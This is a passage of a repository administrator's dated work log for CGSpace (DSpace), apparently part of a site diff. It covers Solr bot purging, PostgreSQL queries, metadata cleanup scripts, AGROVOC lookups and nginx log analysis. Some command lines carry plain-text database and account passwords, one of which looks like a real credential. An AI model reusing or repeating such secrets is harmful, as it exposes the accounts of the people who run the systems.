  • Now looking at the Solr statistics by user agent I see: +
      +
    • SomeRandomText
    • +
    • RestSharp/106.11.7.0
    • +
    • MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)
    • +
    • wp_is_mobile
    • +
    • Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com; Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
    • +
    • insomnia/2022.2.1
    • +
    • ZoteroTranslationServer
    • +
    • omgili/0.5 +http://omgili.com
    • +
    • curb
    • +
    • Sprout Social (Link Attachment)
    • +
    +
  • +
  • I purged 2,900 hits from these user agents from Solr using my check-spider-hits.sh script
  • +
  • I made a pull request to COUNTER-Robots for some of these agents +
      +
    • In the mean time I will add them to our local overrides in DSpace
    • +
    +
  • +
  • Run all system updates on AReS server, update all Docker containers, and restart the server +
      +
    • Start a harvest on AReS
    • +
    +
  • +
+

2022-05-05

+
    +
  • Update PostgreSQL JDBC driver to 42.3.5 in the Ansible infrastructure playbooks and deploy on DSpace Test
  • +
  • Peter asked me how many items we add to CGSpace every year +
      +
    • I wrote a SQL query to check the number of items grouped by their accession dates since 2009:
    • +
    +
  • +
+
localhost/dspacetest= ☘ SELECT EXTRACT(year from text_value::date) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
+ yyyy │ count 
+──────┼───────
+ 2022 │  2073
+ 2021 │  6471
+ 2020 │  4074
+ 2019 │  7330
+ 2018 │  8899
+ 2017 │  6860
+ 2016 │  8451
+ 2015 │ 15692
+ 2014 │ 16479
+ 2013 │  4388
+ 2012 │  6472
+ 2011 │  2694
+ 2010 │  2457
+ 2009 │   293
+
    +
  • Note that I had an issue with casting text_value to date because one item had an accession date of 2016 instead of 2016-09-29T20:14:47Z +
      +
    • Once I fixed that PostgreSQL was able to extract() the year
    • +
    • There were some other methods I tried that worked also, for example TO_DATE():
    • +
    +
  • +
+
localhost/dspacetest= ☘ SELECT EXTRACT(year from TO_DATE(text_value, 'YYYY-MM-DD"T"HH24:MI:SS"Z"')) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
+
    +
  • But it seems PostgreSQL is smart enough to recognize date formatting in strings automatically when we cast so we don’t need to convert to date first
  • +
  • Another thing I noticed is that a few hundred items have accession dates from decades ago, perhaps this is due to importing items from the CGIAR Library?
  • +
  • I spent some time merging a few pull requests for DSpace 6.4 and porting one to main for DSpace 7.x
  • +
  • I also submitted a pull request to migrate Mirage 2’s build from bower and compass to yarn and node-sass
  • +
+

2022-05-07

+
    +
  • Start a harvest on AReS
  • +
+

2022-05-09

+
    +
  • Submit an issue to Atmire’s bug tracker inquiring about DSpace 6.4 support
  • +
+

2022-05-10

+ +

2022-05-12

+
    +
  • CGSpace meeting with Abenet and Peter +
      +
    • We discussed the future of CGSpace and DSpace in general in the new One CGIAR
    • +
    • We discussed how to prepare for bringing in content from the Initiatives, whether we need new metadata fields to support people from IFPRI etc
    • +
    • We discussed the need for good quality Drupal and WordPress modules so sites can harvest content from the repository
    • +
    • Peter asked me to send him a list of investors/funders/donors so he can clean it up, but also to try to align it with ROR and eventually do something like we do with country codes, adding the ROR IDs and potentially showing the badge on item views
    • +
    • We also discussed removing some Mirage 2 themes for old programs and CRPs that don’t have custom branding, ie only Google Analytics
    • +
    +
  • +
  • Export a list of donors for Peter to clean up:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-05-12-donors.csv WITH CSV HEADER;
+COPY 1184
+
    +
  • Then I created a CSV from our cg-creator-identifier.xml controlled vocabulary and ran it against our database with add-orcid-identifiers-csv.py to see if any author names by chance matched that are missing ORCIDs in CGSpace
  • +
+
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-05-12-add-orcids.csv -db dspace -u dspace -p 'fuuu' | tee /tmp/orcid.log
+$ grep -c "Adding ORCID" /tmp/add-orcids.log
+85
+
    +
  • So it’s only eighty-five, but better than nothing…
  • +
  • I removed the custom Mirage 2 themes for some old projects: +
      +
    • AgriFood
    • +
    • AVCD
    • +
    • LIVES
    • +
    • FeedTheFuture
    • +
    • DrylandSystems
    • +
    • TechnicalConsortium
    • +
    • EADD
    • +
    +
  • +
  • That should knock off a few minutes of the maven build time!
  • +
  • I generated a report from the AReS nginx logs on linode18:
  • +
+
# zcat --force /var/log/nginx/access.log.* | grep 'GET /explorer' | goaccess --log-format=COMBINED - -o /tmp/ares_report.html
+

2022-05-13

+
    +
  • Peter finalized the corrections on donors from yesterday so I extracted them into fix/delete CSVs and ran them on CGSpace:
  • +
+
$ ./ilri/fix-metadata-values.py -i 2022-05-13-fix-CGSpace-Donors.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.donor -m 248 -t correct -d
+$ ./ilri/delete-metadata-values.py -i 2022-05-13-delete-CGSpace-Donors.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.donor -m 248 -d
+
    +
  • I cleaned up a few records manually (like some that had \r\n) then re-exported the donors and checked against the latest ROR dump:
  • +
+
$ ./ilri/ror-lookup.py -i /tmp/2022-05-13-donors.csv -r v1.0-2022-03-17-ror-data.json -o /tmp/2022-05-13-ror.csv
+$ csvgrep -c matched -m true /tmp/2022-05-13-ror.csv | wc -l
+230
+$ csvgrep -c matched -m false /tmp/2022-05-13-ror.csv | csvcut -c organization > /tmp/2022-05-13-ror-unmatched.csv
+
    +
  • Then I sent Peter a list so he can try to update some from ROR
  • +
  • I did some work to upgrade the Mirage 2 build dependencies in our 6_x-prod branch +
      +
    • I switched to Node.js 14 also
    • +
    +
  • +
  • Meeting with Margarita and Manuel from ABC to discuss uploading ~6,000 automatically-generated CRP policy reports from MARLO to CGSpace +
      +
    • They will try to provide the records and PDFs by mid June because they are still finalizing the reports for 2021
    • +
    • MARLO will be going offline because it was for the CRPs
    • +
    • We reviewed the metadata they have and gave them some advice on the formatting
    • +
    • Once we upload the records I will need to provide them with a mapping of the MARLO URLs to Handle URLs so they can set up redirects
    • +
    +
  • +
+

2022-05-14

+
    +
  • Start a full Discovery index
  • +
  • Start an AReS harvest
  • +
+

2022-05-23

+
    +
  • Start an AReS harvest
  • +
+

2022-05-24

+
    +
  • Update CGSpace to latest 6_x-prod branch, which removes a handful of Mirage 2 themes and migrates to Node.js 14 and some newer build deps
  • +
  • Run all system updates on CGSpace (linode18) and reboot it
  • +
+

2022-05-25

+
    +
  • Maria Garruccio sent me a handful of new ORCID identifiers for Alliance staff +
      +
    • We currently have 1349 unique identifiers and this adds about forty-five new ones (!):
    • +
    +
  • +
+
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | sort | uniq | wc -l
+1349
+$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new-abc-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2022-05-25-combined-orcids.txt
+$ wc -l /tmp/2022-05-25-combined-orcids.txt
+1395 /tmp/2022-05-25-combined-orcids.txt
+
    +
  • After combining and filtering them I resolved their names using my resolve-orcids.py script:
  • +
+
$ ./ilri/resolve-orcids.py -i /tmp/2022-05-25-combined-orcids.txt -o /tmp/2022-05-25-combined-orcids-names.txt
+
    +
  • There are some names that changed, so I need to run them through the fix-metadata-values.py script:
  • +
+
$ cat 2022-05-25-update-orcids.csv
+cg.creator.identifier,correct
+"Andrea Fongar: 0000-0003-2084-1571","ANDREA CECILIA SANCHEZ BOGADO: 0000-0003-4549-6970"
+"Bekele Shiferaw: 0000-0002-3645-320X","Bekele A. Shiferaw: 0000-0002-3645-320X"
+"Henry Kpaka: 0000-0002-7480-2933","Henry Musa Kpaka: 0000-0002-7480-2933"
+"Josephine Agogbua: 0000-0001-6317-1227","Josephine Udunma Agogbua: 0000-0001-6317-1227"
+"Martha Lilia Del Río Duque: 0000-0002-0879-0292","Martha Del Río: 0000-0002-0879-0292"
+$ ./ilri/fix-metadata-values.py -i 2022-05-25-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -m 247 -t correct -d -n
+Connected to database.
+Would fix 4 occurences of: Andrea Fongar: 0000-0003-2084-1571
+Would fix 1 occurences of: Bekele Shiferaw: 0000-0002-3645-320X
+Would fix 2 occurences of: Josephine Agogbua: 0000-0001-6317-1227
+Would fix 34 occurences of: Martha Lilia Del Río Duque: 0000-0002-0879-0292
+

2022-05-26

+
    +
  • I extracted the names and ORCID identifiers from Maria’s spreadsheet and produced several CSV files with different name formats: +
      +
    • First Last (GREL: cells['First Name'].value + ' ' + cells['Surname'].value)
    • +
    • Last, First (GREL: cells['Surname'].value + ", " + cells['First Name'].value)
    • +
    • Last, F. (GREL: cells['Surname'].value + ", " + cells['First Name'].value.substring(0, 1) + ".")
    • +
    +
  • +
  • Then I constructed a CSV for each of these variations to use with add-orcid-identifiers-csv.py +
      +
    • In total I matched a bunch of authors and added 872 new metadata fields!
    • +
    +
  • +
+

2022-05-27

+
    +
  • Send a follow up to Leroy from the Alliance to ask about the CIAT Library URLs +
      +
    • It seems that I forgot to attach the list of PDFs when I last communicated with him in 2022-03
    • +
    +
  • +
  • Meeting with Terry Bucknell from Overton.io
  • +
+

2022-05-28

+
    +
  • Start a harvest on AReS
  • +
+

2022-05-30

+
    +
  • Help IITA with some collection authorization issues on CGSpace
  • +
  • Finally looking into Peter’s Altmetric export from 2022-02 +
      +
    • We want to try to compare some of the information about open access status with that in CGSpace
    • +
    • I created a new column for all items that have CGSpace handles using this GREL:
    • +
    +
  • +
+
"https://hdl.handle.net/" + value.match(/.*?(10568\/\d+).*?/)[0]
+
    +
  • With that I can do a join on the CGSpace metadata and perhaps clean up some items
  • +
+
$ ./bin/dspace metadata-export -f 2022-05-30-cgspace.csv
+$ csvcut -c 'id,dc.identifier.uri[en_US],dcterms.accessRights[en_US],dcterms.license[en_US]' 2022-05-30-cgspace.csv | sed '1 s/dc\.identifier\.uri\[en_US\]/dc.identifier.uri/' > /tmp/cgspace.csv
+$ csvjoin -c 'dc.identifier.uri' ~/Downloads/2022-05-30-Altmetric-Research-Outputs-CGSpace.csv /tmp/cgspace.csv > /tmp/cgspace-altmetric.csv
+
    +
  • Examining the data in OpenRefine I spot checked a few records where Altmetric and CGSpace disagree and in most cases I found Altmetric to be wrong…
  • +
diff --git a/docs/2022-06/index.html b/docs/2022-06/index.html
new file mode 100644

June, 2022

+ +
+

2022-06-06

+
    +
  • Look at the Solr statistics on CGSpace +
      +
    • I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS “msnbot-” using the Solr query dns:*msnbot* AND dns:*.msn.com
    • +
    • I purged these first so I could see the other “real” IPs in the Solr facets
    • +
    +
  • +
  • I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
  • +
  • I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
  • +
  • I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent +
      +
    • There seem to be many more of these:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/access.log* | grep 208.185.238. | awk '{print $1}' | sort | uniq -c | sort -h
+      2 208.185.238.1
+    166 208.185.238.54
+   1293 208.185.238.51
+   2587 208.185.238.59
+   4692 208.185.238.56
+   5480 208.185.238.53
+   6277 208.185.238.52
+   6400 208.185.238.58
+   8261 208.185.238.55
+  17549 208.185.238.57
+
    +
  • I see 3,000 hits from 178.208.75.33 by a Russian-owned IP in the Netherlands that is making a GET to / every one minute, using a normal user agent
  • +
  • I see 3,000 hits from 134.122.124.196 on Digital Ocean to the REST API with a normal user agent
  • +
  • I purged all these hits from IPs for a total of about 265,000
  • +
  • Then I faceted by user agent and found +
      +
    • 1,000 hits by insomnia/2022.2.1, which I also saw last month and submitted to COUNTER-Robots
    • +
    • 265 hits by omgili/0.5 +http://omgili.com
    • +
    • 150 hits by Vizzit
    • +
    • 132 hits by MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)
    • +
    • 73 hits by Scoop.it
    • +
    • 62 hits by bitdiscovery
    • +
    • 59 hits by Asana/1.4.0 WebsiteMetadataRetriever
    • +
    • 32 hits by Sprout Social (Link Attachment)
    • +
    • 29 hits by CyotekWebCopy/1.9 CyotekHTTP/6.2
    • +
    • 20 hits by Hootsuite-Authoring/1.0
    • +
    +
  • +
  • I purged about 4,100 hits from these user agents
  • +
  • Run all system updates on AReS server (linode20) and reboot
  • +
  • I want to try to update some of the build dependencies of OpenRXV since Node.js 12 is no longer supported
  • +
  • Upgrade linode20 to Ubuntu 22.04 and start an AReS harvest
  • +
  • I merged the Mirage 2 build fix to dspace-6_x for DSpace 6.4
  • +
+

2022-06-07

+
    +
  • I tested Node.js 14 one more time with vanilla DSpace 6.4-SNAPSHOT and with the CGSpace source and it worked well +
      +
    • I made a pull request to DSpace to use Node.js 14 for Mirage 2
    • +
    • I even tested Node.js 16 and it works, but that is enough for now…
    • +
    +
  • +
+

2022-06-08

+
    +
  • Work on AReS a bit since I wasn’t able to harvest after doing the updates on the server and in the containers a few days ago +
      +
    • I don’t know what the problem was really, but on the server I had to enable IPv4 forwarding so the frontend container would build (see the sysctl note at the end of this day's notes)
    • +
    • Once I downed and upped AReS with docker-compose I was able to start a new harvest
    • +
    • I also did some tests to enable ES2020 target in the backend because we’re on Node.js 14 there now
    • +
    +
  • +
+
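    +
  • For reference, enabling IPv4 forwarding is a one-liner with sysctl, plus a drop-in file to persist it across reboots (the file name here is just illustrative):
  • +
+
$ sudo sysctl -w net.ipv4.ip_forward=1
+$ echo 'net.ipv4.ip_forward = 1' | sudo tee /etc/sysctl.d/99-ip-forward.conf
+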

2022-06-13

+
    +
  • Create a user for Mohammed Salem to test MEL submission on DSpace Test:
  • +
+
$ dspace user -a -m mel-submit@cgiar.org -g MEL -s Submit -p 'owwwwwwww'
+
    +
  • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
  • +
+

2022-06-14

+
    +
  • Start a harvest on AReS
  • +
+

2022-06-16

+
    +
  • Francesca asked us to add the CC-BY-3.0-IGO license to the submission form on CGSpace +
      +
    • I remember I had requested SPDX to add CC-BY-NC-ND-3.0-IGO in 2019-02, and they finally merged it in 2020-07, but I never added it to CGSpace
    • +
    • I will add the full suite of CC 3.0 IGO licenses to CGSpace and then make a request to SPDX for the others:
      • CC-BY-3.0-IGO
      • CC-BY-SA-3.0-IGO
      • CC-BY-ND-3.0-IGO
      • CC-BY-NC-3.0-IGO
      • CC-BY-NC-SA-3.0-IGO
      • CC-BY-NC-ND-3.0-IGO
    • +
    +
  • +
  • I filed an issue asking for SPDX to add CC-BY-3.0-IGO
  • +
  • Meeting with Moayad from CodeObia to discuss OpenRXV +
      +
    • He added the ability to use multiple indexes / dashboards, and to be able to embed them in iframes
    • +
    +
  • +
  • Add cg.contributor.initiative with a controlled vocabulary based on CLARISA’s list to the CGSpace submission form
  • +
  • Switch to the linux-virtual-hwe-20.04 kernel on CGSpace (linode18), run all system updates, and reboot
  • +
+

2022-06-17

+
    +
  • I noticed a few ORCID identifiers missing for some scientists so I added them to the controlled vocabulary and then tagged them on CGSpace:
  • +
+
$ cat 2022-06-17-add-orcids.csv
+dc.contributor.author,cg.creator.identifier
+"Tijjani, A.","Abdulfatai Tijjani: 0000-0002-0793-9059"
+"Tijjani, Abdulfatai","Abdulfatai Tijjani: 0000-0002-0793-9059"
+"Mrode, Raphael A.","Raphael Mrode: 0000-0003-1964-5653"
+"Okeyo Mwai, Ally","Ally Okeyo Mwai: 0000-0003-2379-7801"
+"Ojango, Julie M.K.","Ojango J.M.K.: 0000-0003-0224-5370"
+"Prendergast, J.G.D.","James Prendergast: 0000-0001-8916-018X"
+"Ekine-Dzivenu, Chinyere","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
+"Ekine, C.","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
+"Ekine-Dzivenu, C.C","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
+"Shilomboleni, Helena","Helena Shilomboleni: 0000-0002-9875-6484"
+$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-06-17-add-orcids.csv -db dspace -u dspace -p 'fuuu' | tee /tmp/orcids.log
+$ grep -c 'Adding ORCID' /tmp/orcids.log
+304
+
    +
  • Also make some changes to the Discovery facets and item view +
      +
    • I reduced the number of items to show for CRP facets from 20 to 5
    • +
    • I added a facet for the Initiatives
    • +
    • I re-organized a few parts of the item view to add Action Areas and the list of author affiliations
    • +
    +
  • +
+

2022-06-18

+
    +
  • I deployed the changes on CGSpace and started a full Discovery index for the new Initiatives facet
  • +
  • Run dspace cleanup -v on CGSpace
  • +
+

2022-06-20

+
    +
  • Add missing ORCID identifier for ILRI staff to CGSpace and tag their items
  • +
+

2022-06-21

+
    +
  • Work on OpenRXV backend dependencies +
      +
    • Update Elasticsearch and TypeScript and eslint
    • +
    +
  • +
  • Sit in on webinar about contributing terms to AGROVOC +
      +
    • I agreed that I would send Sara Jani from ICARDA a list of new terms we have that don’t match AGROVOC by end of June
    • +
    • I need to indicate which center is using them so we can have an appropriate expert review the terms
    • +
    +
  • +
+

2022-06-22

+
    +
  • I re-deployed AReS with the latest OpenRXV changes then started a fresh harvest
  • +
  • Meeting with Salem to discuss metadata between CGSpace and MEL +
      +
    • We started working through his spreadsheet and then the Internet dropped
    • +
    +
  • +
+

2022-06-23

+
    +
  • Start looking at country names between MEL, CGSpace, and standards like UN M.49 and GeoNames +
      +
    • I used xmllint to extract the countries from CGSpace’s input forms:
    • +
    +
  • +
+
$ xmllint --xpath '//value-pairs[@value-pairs-name="countrylist"]/pair/stored-value/node()' dspace/config/input-forms.xml > /tmp/cgspace-countries.txt
+
    +
  • Then I wrote a Python script (countries-to-csv.py) to read them and save their names alongside the ISO 3166-1 Alpha2 code (a rough sketch of the idea is below, after the join)
  • +
  • Then I joined them with the other lists:
  • +
+
$ csvjoin --outer -c alpha2 ~/Downloads/clarisa-countries.csv ~/Downloads/UNSD\ —\ Methodology.csv ~/Downloads/geonames-countries.csv /tmp/cgspace-countries.csv /tmp/mel-countries.csv > /tmp/countries.csv
+
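    +
  • A minimal sketch of the idea behind countries-to-csv.py, assuming it uses pycountry for the ISO 3166-1 lookups (the real script may differ):
  • +
+
import csv
+import sys
+
+import pycountry
+
+# read one country name per line and write its ISO 3166-1 Alpha2 code alongside it
+with open(sys.argv[1]) as names, open(sys.argv[2], "w", newline="") as out:
+    writer = csv.writer(out)
+    writer.writerow(["alpha2", "name"])
+    for line in names:
+        name = line.strip()
+        if not name:
+            continue
+        try:
+            country = pycountry.countries.lookup(name)
+        except LookupError:
+            try:
+                # fall back to a fuzzy search for slightly different spellings
+                country = pycountry.countries.search_fuzzy(name)[0]
+            except LookupError:
+                country = None
+        writer.writerow([country.alpha_2 if country else "", name])
+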
    +
  • This mostly worked fine, and is much easier than writing another Python script with Pandas…
  • +
+

2022-06-24

+
    +
  • Spent some more time working on my countries-to-csv.py script to fix some logic errors
  • +
  • Then re-export the UN M.49 countries to a clean list because the one I did yesterday somehow has errors:
  • +
+
csvcut -d ';' -c 'ISO-alpha2 Code,Country or Area' ~/Downloads/UNSD\ —\ Methodology.csv | sed -e '1s/ISO-alpha2 Code/alpha2/' -e '1s/Country or Area/UN M.49 Name/' > ~/Downloads/un-countries.csv
+
    +
  • Check the number of lines in each file:
  • +
+
$ wc -l clarisa-countries.csv un-countries.csv cgspace-countries.csv mel-countries.csv
+  250 clarisa-countries.csv
+  250 un-countries.csv
+  198 cgspace-countries.csv
+  258 mel-countries.csv
+
    +
  • I am seeing strange results with csvjoin’s --outer join that I need to keep unmatched terms from both left and right files… +
      +
    • Using xsv join --full is giving me better results:
    • +
    +
  • +
+
$ xsv join --full alpha2 ~/Downloads/clarisa-countries.csv alpha2 ~/Downloads/un-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-xsv-full.csv
+
    +
  • Then adding the CGSpace and MEL countries:
  • +
+
$ xsv join --full alpha2 /tmp/clarisa-un-xsv-full.csv alpha2 /tmp/cgspace-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-cgspace-xsv-full.csv
+$ xsv join --full alpha2 /tmp/clarisa-un-cgspace-xsv-full.csv alpha2 /tmp/mel-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-cgspace-mel-xsv-full.csv
+

2022-06-26

+
    +
  • Start a harvest on AReS
  • +
+

2022-06-28

+
    +
  • Start working on the CGSpace subject export for FAO / AGROVOC
  • +
  • First I exported a list of all metadata in our dcterms.subject and other center-specific subject fields with their counts:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2022-06-28-cgspace-subjects.csv WITH CSV HEADER;
+COPY 27010
+
    +
  • Then I extracted the subjects and looked them up against AGROVOC:
  • +
+
$ csvcut -c subject /tmp/2022-06-28-cgspace-subjects.csv | sed '1d' > /tmp/2022-06-28-cgspace-subjects.txt
+$ ./ilri/agrovoc-lookup.py -i /tmp/2022-06-28-cgspace-subjects.txt -o /tmp/2022-06-28-cgspace-subjects-results.csv
+
    +
  • I keep getting timeouts after every five or ten requests, so this will not be feasible for 27,000 subjects!
  • +
  • I think I will have to write some custom script to use the AGROVOC RDF file +
      +
    • Using rdflib to open the 1.2GB agrovoc_lod.rdf file takes several minutes and doesn’t seem very efficient
    • +
    +
  • +
  • I tried using lightrdf and it’s much quicker, but the documentation is limited and I’m not sure how to search yet +
      +
    • I had to try in different Python versions because 3.10.x is apparently too new
    • +
    +
  • +
  • For future reference I was able to search with lightrdf:
  • +
+
import lightrdf
+parser = lightrdf.Parser()
+# prints millions of lines
+for triple in parser.parse("./agrovoc_lod.rdf", base_iri=None):
+     print(triple)
+agrovoc = lightrdf.RDFDocument('agrovoc_lod.rdf');
+# all results for prefix http://aims.fao.org/aos/agrovoc/c_5
+for triple in agrovoc.search_triples('http://aims.fao.org/aos/agrovoc/c_5', None, None):
+     print(triple)
+('http://aims.fao.org/aos/agrovoc/c_5', 'http://www.w3.org/2004/02/skos/core#altLabel', '"Abalone"@de')
+('http://aims.fao.org/aos/agrovoc/c_5', 'http://www.w3.org/2004/02/skos/core#prefLabel', '"abalones"@en')
+# all stuff for abalones in English
+for triple in agrovoc.search_triples(None, None, '"abalones"@en'):
+     print(triple)
+
    +
  • I ran the agrovoc-lookup.py from a Linode server and it completed without issues… hmmm
  • +
+

2022-06-29

+
    +
  • Continue working on the list of non-AGROVOC subject to report to FAO +
      +
    • I got a one liner to get the list of non-AGROVOC subjects and join them with their counts (updated to use regex in csvgrep):
    • +
    +
  • +
+
$ csvgrep -c 'number of matches' -r '^0$' /tmp/2022-06-28-cgspace-subjects-results.csv \
+  | csvcut -c subject \
+  | csvjoin -c subject /tmp/2022-06-28-cgspace-subjects.csv - \
+  > /tmp/2022-06-28-cgspace-non-agrovoc.csv
+

2022-06-30

+
    +
  • Check some AfricaRice records for potential duplicates on CGSpace for Abenet:
  • +
+
$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/Africarice_2ndBatch_ay.csv | sed '1s/line_number/id/' > /tmp/africarice.csv
+$ csv-metadata-quality -i /tmp/africarice.csv -o /tmp/africarice-cleaned.csv -u
+$ ./ilri/check-duplicates.py -i /tmp/africarice-cleaned.csv -u dspacetest -db dspacetest -p 'dom@in34sniper' -o /tmp/africarice-duplicates.csv
+
    +
  • Looking at the non-AGROVOC subjects again, I see some in our list that are duplicated in uppercase and lowercase, so I will run it again with all lowercase:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2022-06-30-cgspace-subjects.csv WITH CSV HEADER;
+
    +
  • Also, I see there might be something wrong with my csvjoin because nigeria shows up in the final list as having not matched… +
      +
    • Ah, I was using csvgrep -m 0 to find rows that didn’t match, but that also matched items that had 10, 100, 50, etc…
    • +
    • We need to use a regex:
    • +
    +
  • +
+
$ csvgrep -c 'number of matches' -r '^0$' /tmp/2022-06-30-cgspace-subjects-results.csv \
+  | csvcut -c subject \
+  | csvjoin -c subject /tmp/2022-06-30-cgspace-subjects.csv - \
+  > /tmp/2022-06-30-cgspace-non-agrovoc.csv
+
    +
  • Then I took all the terms with fifty or more occurences and put them on a Google Sheet +
      +
    • There I started removing any term that was a variation of an existing AGROVOC term (like cowpea/cowpeas, policy/policies) or a compound concept
    • +
    +
  • +
  • pnbecker on DSpace Slack mentioned that they made a JSPUI deduplication step that is open source: https://github.com/the-library-code/deduplication +
      +
    • It uses Levenshtein distance via PostgreSQL’s fuzzystrmatch extension
    • +
    +
  • +
diff --git a/docs/2022-07/index.html b/docs/2022-07/index.html
new file mode 100644

July, 2022

+ +
+

2022-07-02

+
    +
  • I learned how to use the Levenshtein functions in PostgreSQL (they come from the fuzzystrmatch extension, see the note after this list) +
      +
    • The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
    • +
    • Also, the trgm functions I’ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
    • +
    +
  • +
+
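    +
  • Note that levenshtein() and levenshtein_less_equal() come from the fuzzystrmatch extension, which has to be enabled once per database (a sketch):
  • +
+
localhost/dspace= ☘ CREATE EXTENSION IF NOT EXISTS fuzzystrmatch;
+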
    +
  • A working query checking for duplicates in the recent AfricaRice items is:
  • +
+
localhost/dspace= ☘ SELECT text_value FROM metadatavalue WHERE  dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND levenshtein_less_equal(LOWER('International Trade and Exotic Pests: The Risks for Biodiversity and African Economies'), LEFT(LOWER(text_value), 255), 3) <= 3;
+                                       text_value                                       
+────────────────────────────────────────────────────────────────────────────────────────
+ International trade and exotic pests: the risks for biodiversity and African economies
+(1 row)
+
+Time: 399.751 ms
+
+

2022-07-03

+
    +
  • Start a harvest on AReS
  • +
+

2022-07-04

+
    +
  • Linode told me that CGSpace had high load yesterday +
      +
    • I also got some up and down notices from UptimeRobot
    • +
    • Looking now, I see there was a very high CPU and database pool load, but a mostly normal DSpace session count
    • +
    +
  • +
+

CPU load day +JDBC pool day

+
    +
  • Seems we have some old database transactions since 2022-06-27:
  • +
+

PostgreSQL locks week +PostgreSQL query length week

+
    +
  • Looking at the top connections to nginx yesterday:
  • +
+
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort | uniq -c | sort -h | tail
+   1132 64.124.8.34
+   1146 2a01:4f8:1c17:5550::1
+   1380 137.184.159.211
+   1533 64.124.8.59
+   4013 80.248.237.167
+   4776 54.195.118.125
+  10482 45.5.186.2
+  11177 172.104.229.92
+  15855 2a01:7e00::f03c:91ff:fe9a:3a37
+  22179 64.39.98.251
+
    +
  • And the total number of unique IPs:
  • +
+
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort -u | wc -l
+6952
+
    +
  • This seems low, so it must have been from the request patterns by certain visitors +
      +
    • 64.39.98.251 is Qualys, and I’m debating blocking all their IPs using a geo block in nginx (need to test)
    • +
    • The top few are known ILRI and other CGIAR scrapers, but 80.248.237.167 is on InternetVikings in Sweden, using a normal user agent and scraping Discover
    • +
    • 64.124.8.59 is making requests with a normal user agent and belongs to Castle Global or Zayo
    • +
    +
  • +
  • I ran all system updates and rebooted the server (could have just restarted PostgreSQL but I thought I might as well do everything)
  • +
  • I implemented a geo mapping for the user agent mapping AND the nginx limit_req_zone by extracting the networks into an external file and including it in two different geo mapping blocks +
      +
    • This is clever and relies on the fact that we can use defaults in both cases
    • +
    • First, we map the user agent of requests from these networks to “bot” so that Tomcat and Solr handle them accordingly
    • +
    • Second, we use this as a key in a limit_req_zone, which relies on a default mapping of '' (and nginx doesn’t evaluate empty cache keys)
    • +
    +
  • +
  • I noticed that CIP uploaded a number of Georgian presentations with dcterms.language set to English and Other so I changed them to “ka” +
      +
    • Perhaps we need to update our list of languages to include all instead of the most common ones
    • +
    +
  • +
  • I wrote a script ilri/iso-639-value-pairs.py to extract the names and Alpha 2 codes for all ISO 639-1 languages from pycountry and added them to input-forms.xml
  • +
+

2022-07-06

+
    +
  • CGSpace went down and up a few times due to high load +
      +
    • I found one host in Romania making very high speed requests with a normal user agent (Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C):
    • +
    +
  • +
+
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort | uniq -c | sort -h | tail -n 10
+    516 142.132.248.90
+    525 157.55.39.234
+    587 66.249.66.21
+    593 95.108.213.59
+   1372 137.184.159.211
+   4776 54.195.118.125
+   5441 205.186.128.185
+   6267 45.5.186.2
+  15839 2a01:7e00::f03c:91ff:fe9a:3a37
+  36114 146.19.75.141
+
    +
  • I added 146.19.75.141 to the list of bot networks in nginx
  • +
